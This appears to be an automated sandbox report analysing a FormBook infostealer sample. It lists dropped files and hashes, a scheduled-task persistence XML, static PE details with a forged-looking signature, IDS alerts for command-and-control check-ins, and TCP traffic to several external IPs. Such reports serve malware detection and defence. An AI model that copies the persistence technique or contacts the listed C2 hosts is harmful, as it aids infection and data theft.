                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_diqzzpnn.psu.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vbckn2uh.szo.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vglr2ul4.fms.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vyw5lrur.nvg.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xj23r2an.t2i.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\tmpB98D.tmp

                                                            Download File
                                                            Process:C:\Users\user\Desktop\n2pGr8w21V.exe
                                                            File Type:XML 1.0 document, ASCII text
                                                            Category:dropped
                                                            Size (bytes):1602
                                                            Entropy (8bit):5.114861334449966
                                                            Encrypted:false
                                                            SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt3xvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTBv
                                                            MD5:E0B9503E4DA974199A9419B926AC8556
                                                            SHA1:E21ECCA36957B28567BBA7957FCFCA391E6C6D56
                                                            SHA-256:5589E460D3EAE610AE297E25214B1BD9483759C279B3DC2F18A6DB15626814AF
                                                            SHA-512:73F785217A34F3303DAAD1D433B17EC7B709343A8F3161708A039A6A3F3623B59A471F2F377E2AEED7A4A7265F9A9A92D800F3B608E4DD8E271D3E31DE1E1C9B
                                                            Malicious:true
                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

                                                            C:\Users\user\AppData\Local\Temp\tmpEA52.tmp

                                                            Download File
                                                            Process:C:\Users\user\AppData\Roaming\uEugNEto.exe
                                                            File Type:XML 1.0 document, ASCII text
                                                            Category:dropped
                                                            Size (bytes):1602
                                                            Entropy (8bit):5.114861334449966
                                                            Encrypted:false
                                                            SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt3xvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTBv
                                                            MD5:E0B9503E4DA974199A9419B926AC8556
                                                            SHA1:E21ECCA36957B28567BBA7957FCFCA391E6C6D56
                                                            SHA-256:5589E460D3EAE610AE297E25214B1BD9483759C279B3DC2F18A6DB15626814AF
                                                            SHA-512:73F785217A34F3303DAAD1D433B17EC7B709343A8F3161708A039A6A3F3623B59A471F2F377E2AEED7A4A7265F9A9A92D800F3B608E4DD8E271D3E31DE1E1C9B
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

                                                            C:\Users\user\AppData\Roaming\uEugNEto.exe

                                                            Download File
                                                            Process:C:\Users\user\Desktop\n2pGr8w21V.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):974344
                                                            Entropy (8bit):7.253613594549385
                                                            Encrypted:false
                                                            SSDEEP:12288:2pZsSg9WpaxOwzcGUCAKrsylFGubbaFojeDjBsHhlas8fRQAOkR:2zsC0kwz1AKrxHaGSCHvahfRQAV
                                                            MD5:8D46BAF183C4F911EA9BF65C8797D8EA
                                                            SHA1:1C65169105317DD39497D511F4C7CC1592FBFB69
                                                            SHA-256:5D24A5CB60554C37DD1850F057E8EA8EA021CAE00CB7FEBED5CA6D9768F27502
                                                            SHA-512:6672BA6FFB9F5827B6310739976A7D7E02E620133F1AF3CD1C8B0668D86F66AB7A158ED6B5D381C18E2CD48F9A47E346009D0A1D3A46F71D0279611B2479A313
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 68%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0.................. ........@.. ....................................@.....................................O.......0................6..............p............................................ ............... ..H............text........ ...................... ..`.rsrc...0...........................@..@.reloc..............................@..B.......................H........x..........7...T~..X#...........................................0.............o.....8.....o....t.......u.........,@..t......o....r...po....-..o....r...po....+......,....o.......+&.u...........,...t........o....(........o....:t......u........,...o......*...................0...........#........}.....#........}.....#........}.....#.....L.@}......}......}.....s....}.....s....}.....sG...}.....sM...}......}......}.....(.......(.......{....(.......{!...(.......{....(.......

                                                            C:\Users\user\AppData\Roaming\uEugNEto.exe:Zone.Identifier

                                                            Download File
                                                            Process:C:\Users\user\Desktop\n2pGr8w21V.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.253613594549385
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:n2pGr8w21V.exe
                                                            File size:974'344 bytes
                                                            MD5:8d46baf183c4f911ea9bf65c8797d8ea
                                                            SHA1:1c65169105317dd39497d511f4c7cc1592fbfb69
                                                            SHA256:5d24a5cb60554c37dd1850f057e8ea8ea021cae00cb7febed5ca6d9768f27502
                                                            SHA512:6672ba6ffb9f5827b6310739976a7d7e02e620133f1af3cd1c8b0668d86f66ab7a158ed6b5d381c18e2cd48f9a47e346009d0a1d3a46f71d0279611b2479a313
                                                            SSDEEP:12288:2pZsSg9WpaxOwzcGUCAKrsylFGubbaFojeDjBsHhlas8fRQAOkR:2zsC0kwz1AKrxHaGSCHvahfRQAV
                                                            TLSH:0025E63D29BD222BB175C3A78BEBF427F574986F3114AC6498D343A94346A4734C326E
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................................@................................

                                                            File Icon

                                                            Icon Hash:00928e8e8686b000

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x4ebb06
                                                            Entrypoint Section:.text
                                                            Digitally signed:true
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x8BCFF9D5 [Sat Apr 30 21:02:13 2044 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Authenticode Signature

                                                            Signature Valid:false
                                                            Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                            Signature Validation Error:The digital signature of the object did not verify
                                                            Error Number:-2146869232
                                                            Not Before, Not After
                                                            • 13/11/2018 01:00:00 09/11/2021 00:59:59
                                                            Subject Chain
                                                            • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                            Version:3
                                                            Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                            Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                            Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                            Serial:7C1118CBBADC95DA3752C46E47A27438

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xebab40x4f.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xec0000x630.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0xea8000x3608
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xee0000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xea1ac0x70.text
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000xe9b0c0xe9c00caf453f7d4094c683c92c7fbe450917cFalse0.7635371407085562data7.249824395566697IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc0xec0000x6300x800e63fadfaf78859532e519db6d6962534False0.33642578125data3.492963955510138IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0xee0000xc0x2008dbd6384e55c29c11b2496be1be818ceFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_VERSION0xec0900x3a0data0.4170258620689655
                                                            RT_MANIFEST0xec4400x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                            Imports

                                                            DLLImport
                                                            mscoree.dll_CorExeMain

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2025-01-11T04:15:55.795996+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749999188.114.96.380TCP
                                                            2025-01-11T04:17:00.769441+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749978162.0.215.3380TCP
                                                            2025-01-11T04:17:03.332141+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749979162.0.215.3380TCP
                                                            2025-01-11T04:17:05.895359+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749980162.0.215.3380TCP
                                                            2025-01-11T04:17:14.012290+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749982104.18.73.11680TCP
                                                            2025-01-11T04:17:16.576340+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749983104.18.73.11680TCP
                                                            2025-01-11T04:17:19.121223+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749984104.18.73.11680TCP
                                                            2025-01-11T04:17:28.228467+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749986192.185.147.10080TCP
                                                            2025-01-11T04:17:30.351099+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749987192.185.147.10080TCP
                                                            2025-01-11T04:17:32.930452+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749988192.185.147.10080TCP
                                                            2025-01-11T04:17:40.765854+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74999013.248.169.4880TCP
                                                            2025-01-11T04:17:43.321805+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74999113.248.169.4880TCP
                                                            2025-01-11T04:17:45.866714+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74999213.248.169.4880TCP
                                                            2025-01-11T04:17:58.927917+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74999415.197.148.3380TCP
                                                            2025-01-11T04:18:01.489180+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74999515.197.148.3380TCP
                                                            2025-01-11T04:18:04.955418+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74999615.197.148.3380TCP
                                                            2025-01-11T04:18:13.859937+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749998188.114.96.380TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jan 11, 2025 04:16:44.365437984 CET4992980192.168.2.7185.106.208.3
                                                            Jan 11, 2025 04:16:44.370311022 CET8049929185.106.208.3192.168.2.7
                                                            Jan 11, 2025 04:16:44.370399952 CET4992980192.168.2.7185.106.208.3
                                                            Jan 11, 2025 04:16:44.380201101 CET4992980192.168.2.7185.106.208.3
                                                            Jan 11, 2025 04:16:44.385016918 CET8049929185.106.208.3192.168.2.7
                                                            Jan 11, 2025 04:16:45.093354940 CET8049929185.106.208.3192.168.2.7
                                                            Jan 11, 2025 04:16:45.093393087 CET8049929185.106.208.3192.168.2.7
                                                            Jan 11, 2025 04:16:45.093550920 CET4992980192.168.2.7185.106.208.3
                                                            Jan 11, 2025 04:16:45.096637011 CET4992980192.168.2.7185.106.208.3
                                                            Jan 11, 2025 04:16:45.101494074 CET8049929185.106.208.3192.168.2.7
                                                            Jan 11, 2025 04:17:00.164433002 CET4997880192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:00.169384003 CET8049978162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:00.169501066 CET4997880192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:00.184354067 CET4997880192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:00.189210892 CET8049978162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:00.769330025 CET8049978162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:00.769350052 CET8049978162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:00.769428968 CET8049978162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:00.769442081 CET8049978162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:00.769440889 CET4997880192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:00.769479036 CET8049978162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:00.769483089 CET4997880192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:00.769491911 CET8049978162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:00.769524097 CET4997880192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:01.686954021 CET4997880192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:02.705539942 CET4997980192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:02.710545063 CET8049979162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:02.710628986 CET4997980192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:02.725404024 CET4997980192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:02.730303049 CET8049979162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:03.331998110 CET8049979162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:03.332042933 CET8049979162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:03.332119942 CET8049979162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:03.332140923 CET4997980192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:03.332158089 CET8049979162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:03.332192898 CET8049979162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:03.332209110 CET4997980192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:03.332230091 CET8049979162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:03.332262993 CET8049979162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:03.332274914 CET4997980192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:03.332308054 CET4997980192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:04.233820915 CET4997980192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:05.287898064 CET4998080192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:05.292959929 CET8049980162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:05.293040991 CET4998080192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:05.309784889 CET4998080192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:05.314687014 CET8049980162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:05.314821959 CET8049980162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:05.895186901 CET8049980162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:05.895307064 CET8049980162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:05.895327091 CET8049980162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:05.895339012 CET8049980162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:05.895351887 CET8049980162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:05.895359039 CET4998080192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:05.895365953 CET8049980162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:05.895395041 CET4998080192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:05.895420074 CET4998080192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:06.812016964 CET4998080192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:07.918438911 CET4998180192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:07.923410892 CET8049981162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:07.923491001 CET4998180192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:08.048028946 CET4998180192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:08.053124905 CET8049981162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:08.515913010 CET8049981162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:08.515969038 CET8049981162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:08.516007900 CET8049981162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:08.516045094 CET8049981162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:08.516079903 CET8049981162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:08.516114950 CET8049981162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:08.516148090 CET8049981162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:08.516182899 CET8049981162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:08.516194105 CET4998180192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:08.516216993 CET8049981162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:08.516257048 CET8049981162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:08.516263962 CET4998180192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:08.516293049 CET8049981162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:08.516350031 CET4998180192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:08.516374111 CET4998180192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:08.520865917 CET4998180192.168.2.7162.0.215.33
                                                            Jan 11, 2025 04:17:08.525793076 CET8049981162.0.215.33192.168.2.7
                                                            Jan 11, 2025 04:17:13.561748981 CET4998280192.168.2.7104.18.73.116
                                                            Jan 11, 2025 04:17:13.566521883 CET8049982104.18.73.116192.168.2.7
